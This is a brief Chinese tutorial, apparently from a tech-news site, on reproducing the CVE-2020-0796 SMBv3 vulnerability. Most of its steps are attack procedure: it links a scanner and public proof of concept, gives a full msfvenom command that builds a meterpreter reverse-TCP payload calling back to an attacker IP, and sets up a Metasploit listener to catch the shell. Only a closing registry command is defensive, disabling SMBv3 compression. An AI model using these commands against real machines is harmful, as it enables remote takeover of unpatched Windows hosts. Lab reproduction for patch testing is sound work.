溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

CVE-2020-0796 SMBv3漏洞復現(xiàn)過程是怎樣的

發(fā)布時間:2021-12-28 17:31:25 來源:億速云 閱讀:206 作者:柒染 欄目:安全技術

本篇文章為大家展示了CVE-2020-0796 SMBv3漏洞復現(xiàn)過程是怎樣的,內容簡明扼要并且容易理解,絕對能使你眼前一亮,通過這篇文章的詳細介紹希望你能有所收獲。

1.掃描主機是否存在漏

掃描py文件鏈接

CVE-2020-0796 SMBv3漏洞復現(xiàn)過程是怎樣的

2.下載可利用的POC

poc地址

3.在kali里使用msfvenom生成shell,lhost是攻擊機ip

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.236.130 lport=4444 -f py -o exp.py

CVE-2020-0796 SMBv3漏洞復現(xiàn)過程是怎樣的

4.將生成的shell替換poc文件夾里的exploit.py的USER_PAYLOAD,整個全部替換

CVE-2020-0796 SMBv3漏洞復現(xiàn)過程是怎樣的

5.進入msf開啟監(jiān)聽

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lport 4444
set lhost 192.168.236.130
run

6.運行exploit.py

CVE-2020-0796 SMBv3漏洞復現(xiàn)過程是怎樣的

7.查看監(jiān)聽是否收到

CVE-2020-0796 SMBv3漏洞復現(xiàn)過程是怎樣的

如果報錯根據(jù)錯誤修改exploit.py的參數(shù)。

CVE-2020-0796 SMBv3漏洞復現(xiàn)過程是怎樣的

修復建議:
禁用SMBv 3壓縮,具體命令如下

Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" DisableCompression -Type DWORD -Value 1 -Force

CVE-2020-0796 SMBv3漏洞復現(xiàn)過程是怎樣的

CVE-2020-0796 SMBv3漏洞復現(xiàn)過程是怎樣的

上述內容就是CVE-2020-0796 SMBv3漏洞復現(xiàn)過程是怎樣的,你們學到知識或技能了嗎?如果還想學到更多技能或者豐富自己的知識儲備,歡迎關注億速云行業(yè)資訊頻道。

向AI問一下細節(jié)

免責聲明:本站發(fā)布的內容(圖片、視頻和文字)以原創(chuàng)、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯(lián)系站長郵箱:is@yisu.com進行舉報,并提供相關證據(jù),一經查實,將立刻刪除涉嫌侵權內容。

AI